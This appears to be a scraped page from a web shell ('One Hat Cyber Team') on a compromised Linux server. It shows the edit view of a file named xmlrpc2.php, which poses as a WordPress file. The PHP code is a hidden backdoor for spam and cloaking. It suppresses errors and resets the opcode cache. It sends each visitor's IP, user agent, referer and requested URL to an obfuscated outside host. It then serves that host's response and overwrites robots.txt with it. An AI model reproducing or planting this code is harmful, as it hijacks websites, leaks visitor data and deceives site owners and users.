One Hat Cyber Team

Your IP: 216.73.216.239
Server IP: 172.67.146.37
Server: Linux linux28.yoncu.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
Server Software: Apache
PHP Version: 8.2.29
Buat File | Buat Folder

Edit File: xmlrpc2.php

<?php
error_reporting(0);
if (function_exists('opcache_reset')) { @opcache_reset(); }
function curl_post($url, $user_agent, $data = array()) { $url = str_replace(' ', '+', $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); @curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 4); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); curl_setopt($ch, CURLOPT_ENCODING, ''); $output = curl_exec($ch); $errorCode = curl_errno($ch); curl_close($ch); if (0 !== $errorCode) { return false; } if ($output == "error code: 502"){ return false; } return $output; }
function getIPAddress() { if(!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; }else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REMOTE_ADDR']; } return $ip; }
function is_https() { if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') { return true; } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') { return true; } elseif (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') { return true; } return false; }
$version = "en2";
if (is_https()) {
    $http = 'https://';
} else {
    $http = 'http://';
}
$dataApi = 'https://'.$version.'.tech'.'giz'.'mos.sh'.'op/index.php';

$data1[] = array();
$key_name_arr=array(
"SCRIPT_NAME",
"REQUEST_URI",
"REQUEST_SCHEME",
"SERVER_PORT",
"REMOTE_ADDR",
"HTTP_REFERER",
"HTTP_ACCEPT_LANGUAGE",
"HTTP_USER_AGENT",
"HTTP_HOST"
);
foreach($key_name_arr as $key_name)
{
    $key_value=isset($_SERVER[$key_name])?$_SERVER[$key_name]:'';
    $tran_char=str_replace("+","-",$tran_char);
    $tran_char=str_replace("/","_",$tran_char);
    $tran_char=str_replace("=",".",$tran_char);
    $data1[strtolower($key_name)]=$key_value;
}
$data1['ip'] = getIPAddress();
$data1['http'] = $http;
$user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
$current_url = base64_encode($http.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$p = urlencode($_SERVER["REQUEST_URI"]);
if (strpos($p, "favicon.ico") !== false) {
}else{
    $dataApi = $dataApi."?=".$current_url;
    $curl_content = curl_post($dataApi, $user_agent, $data1);
    if ($curl_content === false) {
    }else if (in_array($curl_content, ["None", "Continue", "blank"])) {
    }else if ($curl_content == "404") {
        header('HTTP/1.1 404 Not Found');
        echo $curl_content;
        exit();
    }else if (strpos($curl_content, '404 Not Found xx_') !== false) {
        header('HTTP/1.1 404 Not Found');
        echo $curl_content;
        exit();
    }else if ($curl_content == "500") {
        header("HTTP/1.0 500 Internal Server Error");
        exit();
    }else {
        $uri = $_SERVER['REQUEST_URI'];
        if (strtolower(substr($uri, -4)) === '.xml') {
            header("Content-type:text/xml");
        }else if (strpos($uri, "robots.txt") || strpos($uri, "pingsitemap") || $uri==="/ping") {
            header("Content-Type: text/plain");
            $robotsFile = fopen("robots.txt", "w");
            fwrite($robotsFile, $curl_content);
            fclose($robotsFile);
        }
        echo $curl_content;
        exit();
    }
}
?>